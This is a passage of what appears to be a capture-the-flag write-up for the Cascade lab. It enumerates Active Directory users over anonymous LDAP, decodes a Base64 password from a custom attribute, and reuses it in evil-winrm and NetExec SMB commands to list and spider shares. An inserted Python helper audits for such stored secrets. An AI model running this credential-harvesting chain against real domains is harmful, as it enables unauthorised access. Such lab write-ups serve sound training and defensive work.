objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200117033736.0Z
dSCorePropagationData: 20200117001404.0Z
dSCorePropagationData: 20200113163635.0Z
dSCorePropagationData: 20200113163628.0Z
dSCorePropagationData: 16010101000417.0Z
lastLogonTimestamp: 132247085871071226
[*] Bye!
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.42.114
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=cascade,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Searching for matching DNs for term: "j.wakefield"
[+] Using DN: CN=James Wakefield,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: James Wakefield
sn: Wakefield
givenName: James
distinguishedName: CN=James Wakefield,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200109203444.0Z
whenChanged: 20200115215201.0Z
displayName: James Wakefield
uSNCreated: 28741
uSNChanged: 118849
name: James Wakefield
objectGUID: 6SX/H/Sf5UOkC8IjbIii7A==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
scriptPath: MapDataDrive.vbs
pwdLastSet: 132230756844150124
primaryGroupID: 513
objectSid: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFXAQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: j.wakefield
sAMAccountType: 805306368
userPrincipalName: [email protected]
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200117033736.0Z
dSCorePropagationData: 20200117001404.0Z
dSCorePropagationData: 20200113163628.0Z
dSCorePropagationData: 20200109203444.0Z
dSCorePropagationData: 16010101000417.0Z
[*] Bye!
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.42.114
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=cascade,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Searching for matching DNs for term: "s.hickson"
[+] Using DN: CN=Stephanie Hickson,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Stephanie Hickson
sn: Hickson
givenName: Stephanie
distinguishedName: CN=Stephanie Hickson,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200113012427.0Z
whenChanged: 20200115215221.0Z
displayName: Stephanie Hickson
uSNCreated: 65594
memberOf: CN=HR,OU=Groups,OU=UK,DC=cascade,DC=local
uSNChanged: 118853
name: Stephanie Hickson
objectGUID: rCGbAiT7r0CiOzKwLPa8NQ==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
scriptPath: MapDataDrive.vbs
pwdLastSet: 132233522678003963
primaryGroupID: 513
objectSid: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFYQQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: s.hickson
sAMAccountType: 805306368
userPrincipalName: [email protected]
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200117033736.0Z
dSCorePropagationData: 20200117001404.0Z
dSCorePropagationData: 20200113163628.0Z
dSCorePropagationData: 20200113012427.0Z
dSCorePropagationData: 16010101000417.0Z
[*] Bye!
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.42.114
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=cascade,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Searching for matching DNs for term: "j.goodhand"
[+] Using DN: CN=John Goodhand,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: John Goodhand
sn: Goodhand
givenName: John
distinguishedName: CN=John Goodhand,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200113014026.0Z
whenChanged: 20200115215154.0Z
displayName: John Goodhand
uSNCreated: 65614
uSNChanged: 118848
name: John Goodhand
objectGUID: 7TACWgpE/kqlMHRot3JgpQ==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
scriptPath: MapDataDrive.vbs
pwdLastSet: 132233532260320793
primaryGroupID: 513
objectSid: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFYgQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: j.goodhand
sAMAccountType: 805306368
userPrincipalName: [email protected]
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200117033736.0Z
dSCorePropagationData: 20200117001404.0Z
dSCorePropagationData: 20200113163628.0Z
dSCorePropagationData: 20200113014026.0Z
dSCorePropagationData: 16010101000417.0Z
[*] Bye!
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.42.114
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=cascade,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Searching for matching DNs for term: "a.turnbull"
[+] Using DN: CN=Adrian Turnbull,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Adrian Turnbull
sn: Turnbull
givenName: Adrian
distinguishedName: CN=Adrian Turnbull,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200113014313.0Z
whenChanged: 20200113034534.0Z
displayName: Adrian Turnbull
uSNCreated: 65635
uSNChanged: 94281
name: Adrian Turnbull
objectGUID: PkhsX7HK0UKVFdwqFTWrnQ==
userAccountControl: 66080
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
pwdLastSet: 132233533933579732
primaryGroupID: 513
objectSid: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFZAQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: a.turnbull
sAMAccountType: 805306368
userPrincipalName: [email protected]
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200117033736.0Z
dSCorePropagationData: 20200117001404.0Z
dSCorePropagationData: 20200113163628.0Z
dSCorePropagationData: 20200113015223.0Z
dSCorePropagationData: 16030216172521.0Z
msDS-SupportedEncryptionTypes: 0
[*] Bye!
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.42.114
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=cascade,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Searching for matching DNs for term: "e.crowe"
[+] Using DN: CN=Edward Crowe,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Edward Crowe
sn: Crowe
givenName: Edward
distinguishedName: CN=Edward Crowe,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200113034502.0Z
whenChanged: 20200128180707.0Z
displayName: Edward Crowe
uSNCreated: 94274
uSNChanged: 245840
name: Edward Crowe
objectGUID: spB7cioaike11C+BNt/oVg==
userAccountControl: 66050
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
scriptPath: MapDataDrive.vbs
pwdLastSet: 132233607021669462
primaryGroupID: 513
objectSid: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFZwQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: e.crowe
sAMAccountType: 805306368
userPrincipalName: [email protected]
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200117033736.0Z
dSCorePropagationData: 20200117001404.0Z
dSCorePropagationData: 20200113163628.0Z
dSCorePropagationData: 20200113034502.0Z
dSCorePropagationData: 16010101000417.0Z
[*] Bye!
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.42.114
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=cascade,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Searching for matching DNs for term: "b.hanson"
[+] Using DN: CN=Ben Hanson,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Ben Hanson
sn: Hanson
givenName: Ben
distinguishedName: CN=Ben Hanson,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200113163539.0Z
whenChanged: 20200128180729.0Z
displayName: Ben Hanson
uSNCreated: 114734
uSNChanged: 245841
name: Ben Hanson
objectGUID: aiS9+OrNYE6UJnr8wuBpHg==
userAccountControl: 66050
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
pwdLastSet: 132234069391538655
primaryGroupID: 513
objectSid: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFaAQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: b.hanson
sAMAccountType: 805306368
userPrincipalName: [email protected]
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200117033736.0Z
dSCorePropagationData: 20200117001404.0Z
dSCorePropagationData: 20200113163628.0Z
dSCorePropagationData: 20200113163539.0Z
dSCorePropagationData: 16010101000417.0Z
[*] Bye!
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.42.114
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=cascade,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Searching for matching DNs for term: "d.burman"
[+] Using DN: CN=David Burman,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: David Burman
sn: Burman
givenName: David
distinguishedName: CN=David Burman,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200113163612.0Z
whenChanged: 20200115215216.0Z
displayName: David Burman
uSNCreated: 114742
uSNChanged: 118852
name: David Burman
objectGUID: UqmXwgkl/0iy14P121+N7A==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
scriptPath: MapDataDrive.vbs
pwdLastSet: 132234069729591249
primaryGroupID: 513
objectSid: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFaQQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: d.burman
sAMAccountType: 805306368
userPrincipalName: [email protected]
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200117033736.0Z
dSCorePropagationData: 20200117001404.0Z
dSCorePropagationData: 20200113163628.0Z
dSCorePropagationData: 20200113163613.0Z
dSCorePropagationData: 16010101000417.0Z
[*] Bye!
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.42.114
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=cascade,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Searching for matching DNs for term: "BackupSvc"
[+] Using DN: CN=BackupSvc,OU=Services,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: BackupSvc
givenName: BackupSvc
distinguishedName: CN=BackupSvc,OU=Services,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200113163703.0Z
whenChanged: 20200113163732.0Z
displayName: BackupSvc
uSNCreated: 114757
uSNChanged: 114765
name: BackupSvc
objectGUID: /AeVxvZYJ0S4xu2RXKx+KA==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
pwdLastSet: 132234070231912131
primaryGroupID: 513
objectSid: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFagQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: BackupSvc
sAMAccountType: 805306368
userPrincipalName: [email protected]
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200117033736.0Z
dSCorePropagationData: 20200117001404.0Z
dSCorePropagationData: 20200113163703.0Z
dSCorePropagationData: 16010101000417.0Z
[*] Bye!
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.42.114
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=cascade,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Searching for matching DNs for term: "j.allen"
[+] Using DN: CN=Joseph Allen,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Joseph Allen
sn: Allen
givenName: Joseph
distinguishedName: CN=Joseph Allen,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200113172359.0Z
whenChanged: 20200115215149.0Z
displayName: Joseph Allen
uSNCreated: 114807
uSNChanged: 118847
name: Joseph Allen
objectGUID: HEPoVWJubkGd3J25ACGaRA==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
scriptPath: MapDataDrive.vbs
pwdLastSet: 132234098399165604
primaryGroupID: 513
objectSid: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFbgQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: j.allen
sAMAccountType: 805306368
userPrincipalName: [email protected]
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200117033736.0Z
dSCorePropagationData: 20200117001404.0Z
dSCorePropagationData: 20200113172359.0Z
dSCorePropagationData: 16010101000417.0Z
[*] Bye!
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.42.114
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=cascade,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Searching for matching DNs for term: "i.croft"
[+] Using DN: CN=Ian Croft,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Ian Croft
sn: Croft
givenName: Ian
distinguishedName: CN=Ian Croft,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200115214621.0Z
whenChanged: 20200128180700.0Z
displayName: Ian Croft
uSNCreated: 118835
uSNChanged: 245839
name: Ian Croft
objectGUID: nRdObhMYfkOzzZt2y5gHxw==
userAccountControl: 66050
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
scriptPath: MapDataDrive.vbs
pwdLastSet: 132235983818652005
primaryGroupID: 513
objectSid: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFbwQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: i.croft
sAMAccountType: 805306368
userPrincipalName: [email protected]
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200117033736.0Z
dSCorePropagationData: 20200117001404.0Z
dSCorePropagationData: 20200115214621.0Z
dSCorePropagationData: 16010101000417.0Z
[*] Bye!
jbrown@Jabaris-MacBook-Pro windapsearch %
Reviewing the LDAP output more closely, something immediately catches my attention.
A custom attribute: cascadeLegacyPwd.
That’s not standard.
And when I look at it, it appears to reveal a password tied to the user r.thompson.
This is exactly why we go back to enumeration.
[*] Bye!
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.42.114
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=cascade,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Searching for matching DNs for term: "r.thompson"
[+] Using DN: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Ryan Thompson
sn: Thompson
givenName: Ryan
distinguishedName: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200109193126.0Z
whenChanged: 20200323112031.0Z
displayName: Ryan Thompson
uSNCreated: 24610
memberOf: CN=IT,OU=Groups,OU=UK,DC=cascade,DC=local
uSNChanged: 295010
name: Ryan Thompson
objectGUID: LfpD6qngUkupEy9bFXBBjA==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 132247339091081169
lastLogoff: 0
lastLogon: 132247339125713230
pwdLastSet: 132230718862636251
primaryGroupID: 513
objectSid: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFVQQAAA==
accountExpires: 9223372036854775807
logonCount: 2
sAMAccountName: r.thompson
sAMAccountType: 805306368
userPrincipalName: [email protected]
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200126183918.0Z
dSCorePropagationData: 20200119174753.0Z
dSCorePropagationData: 20200119174719.0Z
dSCorePropagationData: 20200119174508.0Z
dSCorePropagationData: 16010101000000.0Z
lastLogonTimestamp: 132294360317419816
msDS-SupportedEncryptionTypes: 0
cascadeLegacyPwd: clk0bjVldmE=
Looks like we’ve got what appears to be a hashed password — not plaintext.
Before we try cracking it, we need to identify what type of hash we’re looking at. I like to use this site: https://hashes.com/en/tools/hash_identifier
If it’s Base64 encoded, that’s not a hash algorithm — that’s just an encoding format.
Which means this might not even be a “hash” in the traditional sense.
Base64 is reversible.
So instead of thinking cracking, we think decoding.
You can easily decode it using your native OS tools (Linux, macOS, even Windows PowerShell). Just take the string and decode it — no brute force required.
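As an added example (not the author's code), here is a defender-side audit helper in Python that parses windapsearch-style `attribute: value` output, flags any attribute outside a baseline of standard user-object attributes, and checks whether its value is plain Base64 that decodes to printable text, which is exactly the cascadeLegacyPwd case above. The sample record is constructed in the dump's format; BASELINE_ATTRS is an illustrative subset, not the full AD schema.

```python
import base64
import re
import string

# Attributes normally present on an AD user object (illustrative subset taken
# from the dump above, not the full schema). Anything outside this set is
# either a schema extension or a custom attribute and deserves review.
BASELINE_ATTRS = {
    "objectClass", "cn", "sn", "givenName", "distinguishedName", "instanceType",
    "whenCreated", "whenChanged", "displayName", "uSNCreated", "uSNChanged",
    "name", "objectGUID", "userAccountControl", "badPwdCount", "codePage",
    "countryCode", "badPasswordTime", "lastLogoff", "lastLogon", "pwdLastSet",
    "primaryGroupID", "objectSid", "accountExpires", "logonCount", "memberOf",
    "sAMAccountName", "sAMAccountType", "userPrincipalName", "objectCategory",
    "dSCorePropagationData", "scriptPath", "lastLogonTimestamp",
    "msDS-SupportedEncryptionTypes",
}

ATTR_LINE = re.compile(r"^([A-Za-z][A-Za-z0-9-]*): (.*)$")
B64_SHAPE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
PRINTABLE = set(string.printable) - set("\x0b\x0c")


def parse_records(text):
    """Split tool output into one dict per '[+] Using DN:' block.

    Attribute names map to a list of values because AD attributes such as
    objectClass and memberOf are multi-valued.
    """
    records, current = [], None
    for line in text.splitlines():
        if line.startswith("[+] Using DN:"):
            current = {}
            records.append(current)
        elif current is not None and not line.startswith("["):
            m = ATTR_LINE.match(line)
            if m:
                current.setdefault(m.group(1), []).append(m.group(2))
    return records


def decode_if_base64_text(value):
    """Return the decoded string when value is well-formed Base64 whose bytes
    are all printable ASCII; otherwise None. Binary blobs (SIDs, GUIDs) fail
    the printable check, which is what separates a stored password from
    ordinary Base64-rendered attributes."""
    if len(value) % 4 or not B64_SHAPE.match(value):
        return None
    try:
        text = base64.b64decode(value, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if text and all(ch in PRINTABLE for ch in text) else None


def audit(text):
    """Report every non-baseline attribute; severity is 'high' when the value
    decodes to readable text, 'review' when it stays opaque."""
    findings = []
    for rec in parse_records(text):
        account = rec.get("sAMAccountName", ["?"])[0]
        for attr, values in rec.items():
            if attr in BASELINE_ATTRS:
                continue
            for v in values:
                decoded = decode_if_base64_text(v)
                findings.append({"account": account, "attribute": attr,
                                 "value": v, "decoded": decoded,
                                 "severity": "high" if decoded else "review"})
    return findings


# Constructed sample in the tool's output format; the custom attribute and its
# value for r.thompson are the ones shown on the page, the rest is trimmed.
SAMPLE = """\
[+] Using DN: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: user
sAMAccountName: r.thompson
objectSid: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFVQQAAA==
cascadeLegacyPwd: clk0bjVldmE=
[*] Bye!
[+] Using DN: CN=Ben Hanson,OU=Users,OU=UK,DC=cascade,DC=local
sAMAccountName: b.hanson
objectSid: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFaAQAAA==
[*] Bye!
"""

if __name__ == "__main__":
    for f in audit(SAMPLE):
        print(f"[{f['severity']}] {f['account']}: {f['attribute']} = {f['value']}"
              + (f" -> {f['decoded']!r}" if f["decoded"] else ""))
```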
jbrown@Jabaris-MacBook-Pro cascade % echo "clk0bjVldmE=" | base64 -d
rY4n5eva%
Now that we may have valid credentials, we can attempt to authenticate over WinRM.
Since WinRM is exposed on port 5985, this gives us a potential remote management path into the machine.
We can try connecting as r.thompson using evil-winrm.
jbrown@Jabaris-MacBook-Pro evil-winrm % ./evil-winrm.rb -i 10.129.42.114 -u r.thompson -p rY4n5eva
/opt/homebrew/lib/ruby/gems/4.0.0/gems/winrm-2.3.9/lib/winrm/psrp/fragment.rb:35: warning: redefining 'object_id' may cause serious problems
/opt/homebrew/lib/ruby/gems/4.0.0/gems/winrm-2.3.9/lib/winrm/psrp/message_fragmenter.rb:29: warning: redefining 'object_id' may cause serious problems
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method 'quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\> ls
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
It would be too easy if WinRM just let us straight in.
But that’s fine.
We have credentials now — and that changes everything.
If WinRM doesn’t allow us access, we pivot.
Since SMB is running on 445, we can go back and try authenticating with r.thompson’s creds.
Earlier, anonymous login failed.
But authenticated SMB is a completely different story.
jbrown@Jabaris-MacBook-Pro evil-winrm % nxc smb 10.129.42.114 -u r.thompson -p rY4n5eva
SMB 10.129.42.114 445 CASC-DC1 [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.42.114 445 CASC-DC1 [+] cascade.local\r.thompson:rY4n5eva
jbrown@Jabaris-MacBook-Pro evil-winrm %
That’s what we like to see — successful authentication.
jbrown@Jabaris-MacBook-Pro evil-winrm % nxc smb 10.129.42.114 -u r.thompson -p rY4n5eva --shares
SMB 10.129.42.114 445 CASC-DC1 [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.42.114 445 CASC-DC1 [+] cascade.local\r.thompson:rY4n5eva
SMB 10.129.42.114 445 CASC-DC1 [*] Enumerated shares
SMB 10.129.42.114 445 CASC-DC1 Share Permissions Remark
SMB 10.129.42.114 445 CASC-DC1 ----- ----------- ------
SMB 10.129.42.114 445 CASC-DC1 ADMIN$ Remote Admin
SMB 10.129.42.114 445 CASC-DC1 Audit$
SMB 10.129.42.114 445 CASC-DC1 C$ Default share
SMB 10.129.42.114 445 CASC-DC1 Data READ
SMB 10.129.42.114 445 CASC-DC1 IPC$ Remote IPC
SMB 10.129.42.114 445 CASC-DC1 NETLOGON READ Logon server share
SMB 10.129.42.114 445 CASC-DC1 print$ READ Printer Drivers
SMB 10.129.42.114 445 CASC-DC1 SYSVOL READ Logon server share
jbrown@Jabaris-MacBook-Pro evil-winrm % nxc smb 10.129.42.114 -u r.thompson -p rY4n5eva -M spider_plus
SMB 10.129.42.114 445 CASC-DC1 [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.42.114 445 CASC-DC1 [+] cascade.local\r.thompson:rY4n5eva
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] DOWNLOAD_FLAG: False
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] STATS_FLAG: True
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] OUTPUT_FOLDER: /Users/jbrown/.nxc/modules/nxc_spider_plus
SMB 10.129.42.114 445 CASC-DC1 [*] Enumerated shares
SMB 10.129.42.114 445 CASC-DC1 Share Permissions Remark
SMB 10.129.42.114 445 CASC-DC1 ----- ----------- ------
SMB 10.129.42.114 445 CASC-DC1 ADMIN$ Remote Admin
SMB 10.129.42.114 445 CASC-DC1 Audit$
SMB 10.129.42.114 445 CASC-DC1 C$ Default share
SMB 10.129.42.114 445 CASC-DC1 Data READ
SMB 10.129.42.114 445 CASC-DC1 IPC$ Remote IPC
SMB 10.129.42.114 445 CASC-DC1 NETLOGON READ Logon server share
SMB 10.129.42.114 445 CASC-DC1 print$ READ Printer Drivers
SMB 10.129.42.114 445 CASC-DC1 SYSVOL READ Logon server share
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [+] Saved share-file metadata to "/Users/jbrown/.nxc/modules/nxc_spider_plus/10.129.42.114.json".
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] SMB Shares: 8 (ADMIN$, Audit$, C$, Data, IPC$, NETLOGON, print$, SYSVOL)
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] SMB Readable Shares: 4 (Data, NETLOGON, print$, SYSVOL)
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] SMB Filtered Shares: 1
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] Total folders found: 58
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] Total files found: 20
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] File size average: 1.07 KB
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] File size min: 6 B
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] File size max: 5.83 KB
jbrown@Jabaris-MacBook-Pro cascade % cat 10.129.42.114.json
{
"Data": {
"IT/Email Archives/Meeting_Notes_June_2018.html": {
"atime_epoch": "2020-01-15 20:08:46",
"ctime_epoch": "2020-01-15 20:08:46",
"mtime_epoch": "2020-01-28 13:00:30",
"size": "2.46 KB"
},
"IT/Logs/Ark AD Recycle Bin/ArkAdRecycleBin.log": {
"atime_epoch": "2020-01-10 11:19:20",
"ctime_epoch": "2020-01-10 11:19:20",
"mtime_epoch": "2020-01-28 20:19:11",
"size": "1.27 KB"
},
"IT/Logs/DCs/dcdiag.log": {
"atime_epoch": "2020-01-10 11:17:30",
"ctime_epoch": "2020-01-10 11:17:30",
"mtime_epoch": "2020-01-26 17:22:05",
"size": "5.83 KB"
},
"IT/Temp/s.smith/VNC Install.reg": {
"atime_epoch": "2020-01-28 14:27:43",
"ctime_epoch": "2020-01-28 14:27:43",
"mtime_epoch": "2020-01-28 15:00:01",
"size": "2.62 KB"
}
},
"NETLOGON": {
"MapAuditDrive.vbs": {
"atime_epoch": "2020-01-15 16:45:08",
"ctime_epoch": "2020-01-15 16:45:08",
"mtime_epoch": "2020-01-15 16:50:14",
"size": "258 B"
},
"MapDataDrive.vbs": {
"atime_epoch": "2020-01-15 16:50:28",
"ctime_epoch": "2020-01-15 16:49:19",
"mtime_epoch": "2020-01-15 16:51:03",
"size": "255 B"
}
},
"SYSVOL": {
"cascade.local/Policies/{2906D621-7B58-40F1-AA47-4ED2AEF29484}/GPT.INI": {
"atime_epoch": "2020-01-09 13:12:59",
"ctime_epoch": "2020-01-09 13:12:59",
"mtime_epoch": "2020-01-09 13:13:00",
"size": "59 B"
},
"cascade.local/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI": {
"atime_epoch": "2020-01-09 10:31:40",
"ctime_epoch": "2020-01-09 10:31:40",
"mtime_epoch": "2020-03-23 04:33:59",
"size": "23 B"
},
"cascade.local/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf": {
"atime_epoch": "2020-01-09 10:31:40",
"ctime_epoch": "2020-01-09 10:31:40",
"mtime_epoch": "2020-03-23 04:33:59",
"size": "1.22 KB"
},
"cascade.local/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol": {
"atime_epoch": "2020-01-09 10:48:03",
"ctime_epoch": "2020-01-09 10:48:03",
"mtime_epoch": "2020-01-09 10:48:03",
"size": "2.72 KB"
},
"cascade.local/Policies/{322FEA29-156D-4476-8A06-1935A3525C1C}/GPO.cmt": {
"atime_epoch": "2020-01-09 13:29:34",
"ctime_epoch": "2020-01-09 13:29:34",
"mtime_epoch": "2020-01-09 13:30:29",
"size": "24 B"
},
